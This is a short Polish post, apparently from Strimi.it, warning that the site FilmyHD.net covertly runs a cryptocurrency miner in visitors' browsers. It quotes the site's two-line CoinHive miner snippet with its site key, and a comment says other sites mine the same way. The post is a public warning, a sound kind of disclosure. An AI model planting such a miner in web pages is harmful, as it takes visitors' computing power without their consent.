Strona FilmyHD.net próbuje instalować skrypt do kopania walut.

in strimi •  last year 

Uwaga na stronę FilmyHD.net (http://filmyhd.net/). Strona próbuje instalować skrypt kopiący kryptowaluty na kompie użytkownika. Fragment kodu strony: < var miner = new CoinHive.Anonymous('3HegaDzJ2WiOj8KKP2yimBvt5M6kiIDc'); miner.start();</


Posted on Strimi.it

See the full content Strona FilmyHD.net próbuje instalować skrypt do kopania walut.


Authors get paid when people like you upvote their post.
If you enjoyed what you read here, create your account today and start earning FREE STEEM!
Sort Order:  

To nie jest jedyna witryna, która za pomocą JS (A nawet AngularJS) kopie kryptowaluty w przeglądarce.